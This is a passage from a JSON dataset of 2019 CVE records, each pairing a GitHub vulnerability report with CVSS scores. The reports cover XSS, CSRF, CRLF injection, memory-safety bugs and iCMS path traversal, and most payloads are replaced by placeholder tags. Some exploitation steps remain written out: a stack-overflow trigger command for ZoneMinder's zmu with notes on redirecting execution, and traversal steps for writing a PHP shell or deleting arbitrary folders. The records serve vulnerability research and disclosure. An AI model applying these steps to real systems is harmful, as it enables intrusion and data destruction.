        "description": "Heap Use After Free in server_example_goose. Hi Team, There is Heap Use After Free in server_example_goose, Snip FILETAG APITAG Starting server failed! Exit. APITAG NUMBERTAG ERROR: APITAG heap use after free on address NUMBERTAG e NUMBERTAG dcc8 at pc NUMBERTAG d NUMBERTAG bp NUMBERTAG fdf9f6fedc0 sp NUMBERTAG fdf9f6fedb0 READ of size NUMBERTAG at NUMBERTAG e NUMBERTAG dcc8 thread T NUMBERTAG d NUMBERTAG in APITAG PATHTAG NUMBERTAG dffe in APITAG PATHTAG NUMBERTAG in APITAG PATHTAG NUMBERTAG b NUMBERTAG c in APITAG PATHTAG NUMBERTAG adbb in APITAG PATHTAG NUMBERTAG dea5 in APITAG PATHTAG NUMBERTAG fdfa NUMBERTAG b6b9 in start_thread ( PATHTAG NUMBERTAG fdfa NUMBERTAG b NUMBERTAG c in clone ( PATHTAG NUMBERTAG e NUMBERTAG dcc8 is located NUMBERTAG bytes inside of NUMBERTAG byte region APITAG freed by thread T0 here NUMBERTAG fdfa2b NUMBERTAG ca in __interceptor_free ( PATHTAG NUMBERTAG e NUMBERTAG in Memory_free PATHTAG NUMBERTAG e NUMBERTAG in APITAG PATHTAG NUMBERTAG dc7 in APITAG PATHTAG NUMBERTAG aa3a in APITAG PATHTAG NUMBERTAG b in main PATHTAG NUMBERTAG fdfa NUMBERTAG ca NUMBERTAG f in __libc_start_main ( PATHTAG ) previously allocated by thread T0 here NUMBERTAG fdfa2b NUMBERTAG a in __interceptor_calloc ( PATHTAG NUMBERTAG e NUMBERTAG e in Memory_calloc PATHTAG NUMBERTAG da7f in APITAG PATHTAG NUMBERTAG ea8 in APITAG PATHTAG NUMBERTAG a NUMBERTAG e in APITAG PATHTAG NUMBERTAG a NUMBERTAG d in APITAG PATHTAG NUMBERTAG in main PATHTAG NUMBERTAG fdfa NUMBERTAG ca NUMBERTAG f in __libc_start_main ( PATHTAG ) Thread T1 created by T0 here NUMBERTAG fdfa2ac NUMBERTAG in pthread_create ( PATHTAG NUMBERTAG df2e in Thread_start PATHTAG NUMBERTAG af4f in APITAG PATHTAG NUMBERTAG b4 in main PATHTAG NUMBERTAG fdfa NUMBERTAG ca NUMBERTAG f in __libc_start_main ( PATHTAG ) SUMMARY: APITAG heap use after free PATHTAG APITAG Shadow bytes around the buggy address NUMBERTAG c1c7fff9b NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c1c7fff9b NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c1c7fff9b NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c1c7fff9b NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c1c7fff9b NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c1c7fff9b NUMBERTAG fa fa fa fa fa fa fa fa fd[fd]fd fd fd fd fd fd NUMBERTAG c1c7fff9ba0: fd fd fd fd fd fd fd fd fd fd fd fa fa fa fa fa NUMBERTAG c1c7fff9bb0: fa fa fa fa NUMBERTAG c1c7fff9bc NUMBERTAG fa fa fa fa fa fa fa fa fa NUMBERTAG c1c7fff9bd NUMBERTAG c1c7fff9be NUMBERTAG fa fa fa fa fa fa fa fa fa NUMBERTAG Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe NUMBERTAG ABORTING",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-6777",
        "Issue_Url_old": "https://github.com/ZoneMinder/zoneminder/issues/2436",
        "Issue_Url_new": "https://github.com/zoneminder/zoneminder/issues/2436",
        "Repo_new": "zoneminder/zoneminder",
        "Issue_Created_At": "2019-01-23T08:03:50Z",
        "description": "Reflective XSS vulnerability. Describe Your Environment APITAG NUMBERTAG Describe the bug Reflective XSS vulnerability To Reproduce APITAG has one reflective XSS vulnerabilities FILETAG line NUMBERTAG The parameters in the request are accepted at NUMBERTAG lines, and the page is output at NUMBERTAG lines without verification. FILETAG FILETAG Expected behavior The vulnerability mcan lead to user information leakage, unauthorized operation Debug Logs APITAG quotes so they are formatted properly> `",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-6779",
        "Issue_Url_old": "https://github.com/chshcms/cscms/issues/3",
        "Issue_Url_new": "https://github.com/chshcms/cscms/issues/3",
        "Repo_new": "chshcms/cscms",
        "Issue_Created_At": "2019-01-24T14:51:59Z",
        "description": "There is a CSRF vulnerability that can PATHTAG friend links. just use add friend links for example: After the admin logged in, we can send him a url with these code on that page APITAG CODETAG after he clicked that button, then we can add our malicious link to the friend link: admin page: APITAG homepage: APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.1,
        "impactScore": 5.2,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-6802",
        "Issue_Url_old": "https://github.com/pypiserver/pypiserver/issues/237",
        "Issue_Url_new": "https://github.com/pypiserver/pypiserver/issues/237",
        "Repo_new": "pypiserver/pypiserver",
        "Issue_Created_At": "2019-01-24T17:43:58Z",
        "description": "CRLF injection via new line characters in URI. Summary pypiserver doesn't escape new line characters when redirecting users. I'm not too sure if this is only in the default installation, or that if users used a redirect functionality it would additionally be vulnerable. Steps to Reproduce NUMBERTAG Download pypiserver and host a default installation NUMBERTAG Open URLTAG NUMBERTAG Observe cookie being set Impact Create arbitrary HTTP responses, set malicious cookies, potential for XSS depending on implementation (i.e. location header doesn't redirect to a valid host and therefore displays whatever content is available)",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-6803",
        "Issue_Url_old": "https://github.com/typora/typora-issues/issues/2124",
        "Issue_Url_new": "https://github.com/typora/typora-issues/issues/2124",
        "Repo_new": "typora/typora-issues",
        "Issue_Created_At": "2019-01-24T14:38:57Z",
        "description": "Typora XSS to RCE. The filtering rules on the left outline bar are not perfect. When the document has the following content, it will cause XSS\uff0cand then could raise to RCE: eg: APITAG ERRORTAG could execute cmd command. FILETAG the Linux and Mac version has the same problem.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-6804",
        "Issue_Url_old": "https://github.com/rundeck/rundeck/issues/4406",
        "Issue_Url_new": "https://github.com/rundeck/rundeck/issues/4406",
        "Repo_new": "rundeck/rundeck",
        "Issue_Created_At": "2019-01-22T21:38:39Z",
        "description": "Security: stored XSS vulnerability. Describe the bug A stored XSS vulnerability exists in the Job Edit page My Rundeck detail Rundeck version NUMBERTAG install type: any To Reproduce (forthcoming)",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-6966",
        "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/361",
        "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/361",
        "Repo_new": "axiomatic-systems/bento4",
        "Issue_Created_At": "2019-01-25T07:49:22Z",
        "description": "failed to allocate APITAG in APITAG at Bento NUMBERTAG when running mp NUMBERTAG hls. A crafted input will lead to failed allocate APITAG in APITAG at Bento NUMBERTAG Triggered by ./mp NUMBERTAG hls crash3.mp4 Poc FILETAG Bento4 Version NUMBERTAG The ASAN information is as follows: ERRORTAG APITAG wu.an. EMAILTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-6978",
        "Issue_Url_old": "https://github.com/libgd/libgd/issues/492",
        "Issue_Url_new": "https://github.com/libgd/libgd/issues/492",
        "Repo_new": "libgd/libgd",
        "Issue_Created_At": "2019-01-15T11:09:33Z",
        "description": "Update APITAG APITAG functions for possible Double free bugs. Hi, please commit the patch file.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-6988",
        "Issue_Url_old": "https://github.com/uclouvain/openjpeg/issues/1178",
        "Issue_Url_new": "https://github.com/uclouvain/openjpeg/issues/1178",
        "Repo_new": "uclouvain/openjpeg",
        "Issue_Created_At": "2019-01-17T14:49:50Z",
        "description": "memory exhauted and hangs long time when use NUMBERTAG bit opj_decompress. I found a problem which will cause memory is exhausted, and program hang for NUMBERTAG minutes. My test server had NUMBERTAG GB of memory. This can cause denial of service. Steps to Reproduce NUMBERTAG Download and unzip FILETAG NUMBERTAG Run APITAG NUMBERTAG When I test it use NUMBERTAG bit opj_decompress with asan, the following is the output information ERRORTAG Analysis NUMBERTAG Alloc too much big memory NUMBERTAG Maybe too many cycles System Configuration version: git commit APITAG Environment: Ubuntu NUMBERTAG TLS Memery Size NUMBERTAG GB component NUMBERTAG bit opj_decompress",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-6990",
        "Issue_Url_old": "https://github.com/ZoneMinder/zoneminder/issues/2444",
        "Issue_Url_new": "https://github.com/zoneminder/zoneminder/issues/2444",
        "Repo_new": "zoneminder/zoneminder",
        "Issue_Created_At": "2019-01-24T18:48:25Z",
        "description": "Stored Self Cross Site Scripting (XSS) FILETAG . Describe Your Environment APITAG NUMBERTAG Installed from ppa:iconnor/zoneminder master Describe the bug In the view zone , an user can PATHTAG zones. While adding a zone, there exists no input filtration, allowing an attacker to inject unintended values. Later while displaying the zone names on the webpage,there exists no output filtration, leading to Self Stored based XSS. To Reproduce Affected URL : URLTAG Payload used ERRORTAG Navigate to the Affected URL Click on Add a new zone (pop up appears) Add the XSS payload into the NAME field & select any of option from the Type dropdown field & click on save. Navigate back to the Affected URL, payload would be triggered. APITAG Expected behavior Proper escaping of special characters. Debug Logs None",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2019-6991",
        "Issue_Url_old": "https://github.com/ZoneMinder/zoneminder/issues/2478",
        "Issue_Url_new": "https://github.com/zoneminder/zoneminder/issues/2478",
        "Repo_new": "zoneminder/zoneminder",
        "Issue_Created_At": "2019-01-25T03:16:25Z",
        "description": "Stack based buffer Overflow /src/zm_user.cpp (zmu). Describe Your Environment APITAG NUMBERTAG Installed from ppa:iconnor/zoneminder master Describe the bug A Stack overflows occur when variable size data is copied into fixed length buffers located on the program stack without any bounds checking. Vulnerabilities of this class are generally considered to be of high severity since their exploitation would mostly permit arbitrary code execution or Denial of Service. To Reproduce APITAG Binary_ zmu An attacker can exploit the buffer by smashing the stack and modifying the return address of the function. This can be used to call some other function, like pointing the return address to some custom shellcode, injected into the stack. _In function_: APITAG APITAG function_: APITAG APITAG The vulnerability exists in function APITAG , in APITAG , while authenticating the user. The vulnerability exists in the login functionality. Once a username & password is supplied to the zmu binary, the username & password is passed through APITAG function in order to produce an escaped SQL string. Due to absense of any protection and limitation placed to the length of username & password, there exists a stack based buffer overflow. APITAG code _ APITAG APITAG APITAG APITAG APITAG We need to compile the binary from source, using custom flags, inorder to trigger & debug the vulnerability. APITAG to compile_ mkdir build (In zoneminder directory) cd build cmake .. DCMAKE_C_FLAGS=\" fsanitize=address g O0 fno stack protector\" DCMAKE_CXX_FLAGS=\" fsanitize=address g O0 fno stack protector\" cd src/ APITAG to run_ ./zmu U $(python c \"print 'a NUMBERTAG P admin APITAG Cause Analysis_ Vulnerable function syntax unsigned long APITAG mysql, char to, const char from, unsigned long length) Characters in the from argument are escaped & the result is placed in the to argument, of the length specified, followed by a terminating null byte . As per the Mysql documentation, APITAG string pointed to by from must be length bytes long. You must allocate the to buffer to be at least length NUMBERTAG bytes long. (In the worst case, each character may need to be encoded as using two bytes, and there must be room for the terminating null byte.) When APITAG returns, the contents of to is a null terminated string.\" But as per the current code, the length is calculated form the lenth of the username & password (from) argument & can exceed more than the APITAG & APITAG (to) limit, which is an fixed array (safer_username NUMBERTAG safer_password NUMBERTAG causing stack based buffer overflow. By looking at the comments written in APITAG function APITAG the to argumunt array is calculated based upon the current db username size, which is of NUMBERTAG Following what's said in the documentation (length NUMBERTAG bytes long NUMBERTAG is the limit set for the to argument safer_username (same for safer_password). Ignoring the fact that there's no limit set for the username, password input received to the binary. ERRORTAG APITAG Initially the username & password pointer address remains valid, until it reaches safer_username, populating other pointer addresses with the injected payload. CODETAG ERRORTAG Here we can see, how the pointer address values are populated with the injected values (a's) . Later the code, when the pointer addresses are accessed, segmentation fault is raised due to an invalid memory access. Expected behavior An attacker can Bypass authentication by overwriting the function pointer. It should limit the username limit. Debug Logs None",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-6992",
        "Issue_Url_old": "https://github.com/ZoneMinder/zoneminder/issues/2445",
        "Issue_Url_new": "https://github.com/zoneminder/zoneminder/issues/2445",
        "Repo_new": "zoneminder/zoneminder",
        "Issue_Created_At": "2019-01-24T18:53:08Z",
        "description": "POST (self) Reflected Cross Site Scripting (XSS) FILETAG . Describe Your Environment APITAG NUMBERTAG Installed from ppa:iconnor/zoneminder master Describe the bug The view controlcap , displays the Name field APITAG value on the webpage with no proper filtration, leading to POST based self XSS. To Reproduce Affected URL : URLTAG Payload used ERRORTAG Navigate to the Affected URL Add the XSS payload into the NAME field & click on MOVE tab, Payload would be triggered. APITAG Expected behavior Proper escaping of special characters. Debug Logs None",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-7151",
        "Issue_Url_old": "https://github.com/WebAssembly/binaryen/issues/1881",
        "Issue_Url_new": "https://github.com/webassembly/binaryen/issues/1881",
        "Repo_new": "webassembly/binaryen",
        "Issue_Created_At": "2019-01-20T12:11:54Z",
        "description": "Null pointer Deference in APITAG Hi, there. A Null pointer Deference problem was discovered in APITAG A crafted wasm input can cause segment faults and I have confirmed them with address sanitizer too. Here are the POC files. Please use \"wasm opt $POC\" to reproduce the problem. FILETAG git log: ERRORTAG The ASAN dumps the stack trace as follows: ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-7152",
        "Issue_Url_old": "https://github.com/WebAssembly/binaryen/issues/1880",
        "Issue_Url_new": "https://github.com/webassembly/binaryen/issues/1880",
        "Repo_new": "webassembly/binaryen",
        "Issue_Created_At": "2019-01-20T12:07:15Z",
        "description": "A Heap buffer overflow problem was discovered in APITAG int). Hi, there. A Heap buffer overflow problem was discovered in APITAG int). A crafted wasm input can cause segment faults and I have confirmed them with address sanitizer too. Here are the POC files. Please use \"./wasm opt $POC\" to reproduce the error. FILETAG git log: ERRORTAG The ASAN dumps the stack trace as follows: ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-7153",
        "Issue_Url_old": "https://github.com/WebAssembly/binaryen/issues/1879",
        "Issue_Url_new": "https://github.com/webassembly/binaryen/issues/1879",
        "Repo_new": "webassembly/binaryen",
        "Issue_Created_At": "2019-01-20T12:02:25Z",
        "description": "Null pointer Deference in APITAG int) in wasm/wasm APITAG Hi, there. A Null pointer Deference problem was discovered in APITAG int) in wasm/wasm APITAG A crafted wasm input can cause segment faults and I have confirmed them with address sanitizer too. Here are the POC files. Please use \"wasm opt $POC\" to reproduce the problem. FILETAG git log ERRORTAG The ASAN dumps the stack trace as follows: ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-7154",
        "Issue_Url_old": "https://github.com/WebAssembly/binaryen/issues/1876",
        "Issue_Url_new": "https://github.com/webassembly/binaryen/issues/1876",
        "Repo_new": "webassembly/binaryen",
        "Issue_Created_At": "2019-01-19T07:42:40Z",
        "description": "A Heap buffer overflow problem was discovered in APITAG function in simple_ast.h. Hi, there. A Heap buffer overflow problem was discovered in APITAG function in simple_ast.h in emscripten optimizer, as distributed in Binaryen NUMBERTAG A crafted wasm input can cause segment faults and I have confirmed them with address sanitizer too. Here are the POC files. Please use \"./wasm2js $POC\" to reproduce the error. FILETAG git log: CODETAG The ASAN dumps the stack trace as follows: ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-7156",
        "Issue_Url_old": "https://github.com/uvoteam/libdoc/issues/5",
        "Issue_Url_new": "https://github.com/uvoteam/libdoc/issues/5",
        "Repo_new": "uvoteam/libdoc",
        "Issue_Created_At": "2019-01-29T03:14:13Z",
        "description": "division by zero in APITAG at libdoc master branch( PATHTAG ) when using libdoc.a. A crafted input will lead to \u2019division by zero\u2018 in APITAG at libdoc master branch( PATHTAG ) when using libdoc.a Triggered by APITAG Poc FILETAG The gdb information is as follows: ERRORTAG APITAG wu.an. EMAILTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-7160",
        "Issue_Url_old": "https://github.com/idreamsoft/iCMS/issues/50",
        "Issue_Url_new": "https://github.com/idreamsoft/icms/issues/50",
        "Repo_new": "idreamsoft/iCMS",
        "Issue_Created_At": "2019-01-29T07:59:19Z",
        "description": "iCMS NUMBERTAG unzip vulnerability GET SHELL. in FILETAG ERRORTAG and see the FILETAG ERRORTAG so we can use ../ to write a package file to anyother folder in the server\u3002 fitst use this request to write a package file with a php file in it FILETAG FILETAG see FILETAG ERRORTAG and than use this request to unzip this package FILETAG so we upload a php file FILETAG author by ji. EMAILTAG .cn",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-7164",
        "Issue_Url_old": "https://github.com/sqlalchemy/sqlalchemy/issues/4481",
        "Issue_Url_new": "https://github.com/sqlalchemy/sqlalchemy/issues/4481",
        "Repo_new": "sqlalchemy/sqlalchemy",
        "Issue_Created_At": "2019-01-31T18:03:14Z",
        "description": "sql injection via the order_by parameter. MENTIONTAG APITAG through NUMBERTAG and NUMBERTAG through NUMBERTAG b2 allows SQL Injection via the order_by parameter NUMBERTAG exp save the code to local: FILETAG exec code at shell terminal python dal.py APITAG python dal.py APITAG python dal.py 'create_time' the vul happens at fun order_by NUMBERTAG reserved by CVETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-7168",
        "Issue_Url_old": "https://github.com/croogo/croogo/issues/886",
        "Issue_Url_new": "https://github.com/croogo/croogo/issues/886",
        "Repo_new": "croogo/croogo",
        "Issue_Created_At": "2019-01-16T11:58:30Z",
        "description": "Stored XSS in APITAG field Content. Description There's no escape being done before printing out the value of Blog in the Content page. Croogo version NUMBERTAG Steps to reproduce Navigate to URLTAG & add the below shared payload as the Blog field value. Payload Introduction to ICT ERRORTAG Visit page URLTAG the payload will be triggered. FILETAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.8,
        "impactScore": 2.7,
        "exploitabilityScore": 1.7
    },
    {
        "CVE_ID": "CVE-2019-7169",
        "Issue_Url_old": "https://github.com/croogo/croogo/issues/888",
        "Issue_Url_new": "https://github.com/croogo/croogo/issues/888",
        "Repo_new": "croogo/croogo",
        "Issue_Created_At": "2019-01-16T12:00:04Z",
        "description": "Stored XSS in APITAG field Main Menu. Description There's no escape being done before printing out the value of Title in the Main Menu page. croogo version NUMBERTAG Steps to reproduce Navigate to URLTAG & add the below shared payload as the value to the Title field. Payload ERRORTAG Visit page URLTAG the payload will be triggered. FILETAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.8,
        "impactScore": 2.7,
        "exploitabilityScore": 1.7
    },
    {
        "CVE_ID": "CVE-2019-7170",
        "Issue_Url_old": "https://github.com/croogo/croogo/issues/890",
        "Issue_Url_new": "https://github.com/croogo/croogo/issues/890",
        "Repo_new": "croogo/croogo",
        "Issue_Created_At": "2019-01-16T12:01:39Z",
        "description": "Stored XSS in APITAG field Vocabulary page. Description There's no escape being done before printing out the value of Title in the Vocabulary page. croogo version NUMBERTAG Steps to reproduce Navigate to URLTAG & add the below shared payload as the values to the Title field. Payload ERRORTAG Visit page URLTAG the payload will be triggered. FILETAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.8,
        "impactScore": 2.7,
        "exploitabilityScore": 1.7
    },
    {
        "CVE_ID": "CVE-2019-7171",
        "Issue_Url_old": "https://github.com/croogo/croogo/issues/887",
        "Issue_Url_new": "https://github.com/croogo/croogo/issues/887",
        "Repo_new": "croogo/croogo",
        "Issue_Created_At": "2019-01-16T11:59:19Z",
        "description": "Stored XSS in APITAG field Blocks. Description There's no escape being done before printing out the value of Title in the Blocks page. croogo version NUMBERTAG Steps to reproduce Navigate to URLTAG & add the below shared payload as the Title field value. Payload ERRORTAG Visit page URLTAG the payload will be triggered. FILETAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.8,
        "impactScore": 2.7,
        "exploitabilityScore": 1.7
    },
    {
        "CVE_ID": "CVE-2019-7172",
        "Issue_Url_old": "https://github.com/atutor/ATutor/issues/164",
        "Issue_Url_new": "https://github.com/atutor/atutor/issues/164",
        "Repo_new": "atutor/atutor",
        "Issue_Created_At": "2019-01-16T11:55:48Z",
        "description": "Stored XSS in APITAG Name\" field My Account. Description There's no escape being done before printing out the value of Real Name in the My Account page. APITAG version NUMBERTAG Steps to reproduce Navigate to FILETAG & add the below shared payload as the value to the Real Name field. Payload ERRORTAG Visit page FILETAG the payload will be triggered. FILETAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-7173",
        "Issue_Url_old": "https://github.com/croogo/croogo/issues/889",
        "Issue_Url_new": "https://github.com/croogo/croogo/issues/889",
        "Repo_new": "croogo/croogo",
        "Issue_Created_At": "2019-01-16T12:01:11Z",
        "description": "Stored XSS in APITAG field Attachment page. Description There's no escape being done before printing out the value of Title in the Attachment page. Croogo version NUMBERTAG Steps to reproduce Navigate to URLTAG & add the below shared payload as the value to the Title field. Payload webappumldeploy ERRORTAG Visit page URLTAG the payload will be triggered. FILETAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.8,
        "impactScore": 2.7,
        "exploitabilityScore": 1.7
    },
    {
        "CVE_ID": "CVE-2019-7175",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1450",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1450",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2019-01-17T02:37:57Z",
        "description": "memory leak in APITAG in coders/pcd.c different from NUMBERTAG and NUMBERTAG Prerequisites x] I have written a descriptive issue title [x] I have verified that I am using the latest version of APITAG [x] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description APITAG memory leak in APITAG in coders/pcd.c, which is different from NUMBERTAG and NUMBERTAG Steps to Reproduce APITAG columns NUMBERTAG i++) { APITAG length=(sum NUMBERTAG ff NUMBERTAG APITAG ) APITAG //line NUMBERTAG sizeof( pcd_table[i])); if (pcd_table[i] == APITAG ) NULL) //line NUMBERTAG buffer=(unsigned char ) APITAG ERRORTAG //line NUMBERTAG image >filename); } r=pcd_table[i]; for (j NUMBERTAG j APITAG length=(unsigned int) (sum NUMBERTAG ff NUMBERTAG if (r >length NUMBERTAG line NUMBERTAG buffer=(unsigned char ) APITAG APITAG //line NUMBERTAG APITAG r >sequence=(unsigned int) (sum NUMBERTAG ffff) APITAG key=(unsigned char) (sum NUMBERTAG ff); r >mask NUMBERTAG U NUMBERTAG r >length NUMBERTAG r++; } pcd_length[i]=(size_t) length; } ERRORTAG c if (pcd_table[i] == APITAG ) NULL) //line NUMBERTAG buffer=(unsigned char ) APITAG for (k NUMBERTAG k APITAG filename); } if (r >length NUMBERTAG buffer=(unsigned char ) APITAG for (k NUMBERTAG k APITAG APITAG version: APITAG APITAG Environment APITAG system, version and so on): Ubuntu NUMBERTAG Additional information: APITAG Credit to Bingchang Liu at VARAS of IIE",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-7233",
        "Issue_Url_old": "https://github.com/uvoteam/libdoc/issues/6",
        "Issue_Url_new": "https://github.com/uvoteam/libdoc/issues/6",
        "Repo_new": "uvoteam/libdoc",
        "Issue_Created_At": "2019-01-30T01:57:15Z",
        "description": "Segmentation fault in APITAG at libdoc master branch( PATHTAG ) when using libdoc.a. A parameter which do not exist will lead to Segmentation fault in APITAG at libdoc master branch( PATHTAG ) when using libdoc.a Triggered by APITAG Poc ./doc2txt APITAG The ASAN information is as follows: ERRORTAG APITAG wu.an. EMAILTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-7235",
        "Issue_Url_old": "https://github.com/idreamsoft/iCMS/issues/52",
        "Issue_Url_new": "https://github.com/idreamsoft/icms/issues/52",
        "Repo_new": "idreamsoft/iCMS",
        "Issue_Created_At": "2019-01-30T06:40:33Z",
        "description": "iCMS NUMBERTAG can delete any folder. first use URLTAG to change parameter _app to /../ ,for example we create a folder named test and changes _app to /../test FILETAG FILETAG in PATHTAG ERRORTAG in PATHTAG ERRORTAG nd when we request URLTAG to uninstall this app the $appdir is PATHTAG we can delete the test folder FILETAG FILETAG now the test is deleted FILETAG if we use ../ to change the parameter _app \uff0cwe can delete any folder author by ji. EMAILTAG .cn",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
